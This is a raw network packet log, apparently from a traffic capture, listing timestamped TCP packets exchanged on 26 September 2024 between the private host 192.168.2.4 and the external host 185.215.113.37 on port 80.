Sep 26, 2024 18:27:05.945597887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.945636034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.945667028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.945684910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.945699930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.945713997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.945733070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.945744038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.945780039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.945812941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.945846081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.945862055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.945878983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.945895910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.945910931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.945928097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.945956945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.945960999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.945995092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946003914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946029902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946046114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946074009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946147919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946178913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946192980 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946211100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946223974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946244001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946255922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946276903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946286917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946310043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946321964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946343899 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946356058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946391106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946518898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946548939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946574926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946583033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946588993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946616888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946625948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946660042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946666002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946697950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946712017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946732044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946741104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946777105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946871996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946904898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946921110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946937084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946949005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946981907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.946984053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.946990967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947020054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947024107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947041988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947057009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947068930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947089911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947103977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947124958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947139025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947174072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947194099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947226048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947241068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947261095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947272062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947309017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947362900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947413921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947561026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947594881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947607040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947627068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947644949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947660923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947676897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947693110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947705030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947732925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947743893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947776079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947789907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947807074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947819948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947840929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947869062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947879076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947905064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947926044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947936058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.947961092 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.947973013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.948004007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.948076963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.948110104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.948129892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.948142052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.948153973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.948174953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.948189974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.948208094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.948220968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.948241949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.948254108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.948273897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.948287010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.948316097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980118036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980154991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980206013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980237007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980271101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980284929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980304003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980320930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980339050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980356932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980386019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980391979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980416059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980418921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980434895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980468988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980470896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980515957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980524063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980551004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980568886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980582952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980600119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980616093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980637074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980644941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980660915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980679989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980699062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980726004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980732918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980784893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980787039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980834961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980837107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980869055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980882883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980920076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980921030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980952978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.980973005 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.980998993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.981003046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.981035948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.981060028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.981077909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.981085062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.981118917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.981137991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.981151104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.981177092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.981184959 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.981230974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.981230974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.981234074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.981281996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.981292963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.981312990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.981328964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.981345892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.981354952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.981379032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.981395006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.981411934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.981431007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.981443882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.981461048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.981481075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.981496096 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.981514931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.981535912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.981559038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.996819973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.996874094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.996907949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.996927023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.996949911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.996958017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.996970892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.996990919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.997013092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.997024059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.997050047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.997056961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:05.997068882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:05.997106075 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.032803059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.032839060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.032872915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.032916069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.032921076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.032947063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.032954931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.032977104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.032990932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033004999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033025980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033035040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033060074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033086061 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033107042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033162117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033194065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033225060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033230066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033243895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033281088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033298969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033332109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033345938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033380032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033381939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033416986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033437014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033447981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033473969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033480883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033498049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033513069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033545017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033560991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033565998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033593893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033616066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033627033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033639908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033678055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033694983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033723116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033744097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033754110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033767939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033807993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033822060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033842087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033870935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033874035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033889055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033907890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033927917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033941984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.033958912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033993959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.033994913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034027100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034059048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034063101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034087896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034090996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034122944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034122944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034145117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034157038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034171104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034193039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034204960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034239054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034271002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034301996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034322977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034334898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034348011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034368038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034392118 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034399986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034410000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034444094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034468889 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034490108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034493923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034526110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034548998 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034559011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034568071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034593105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034617901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034642935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034817934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034849882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034876108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034883022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034898043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034917116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034935951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034950018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.034972906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.034982920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035002947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035015106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035032988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035048962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035069942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035096884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035105944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035131931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035154104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035164118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035192013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035198927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035209894 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035233021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035264015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035268068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035296917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035304070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035304070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035372019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035408020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035433054 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035484076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035520077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035542965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035552025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035569906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035586119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035604000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.035624027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.035640955 CEST	49730	80	192.168.2.4	185.215.113.37
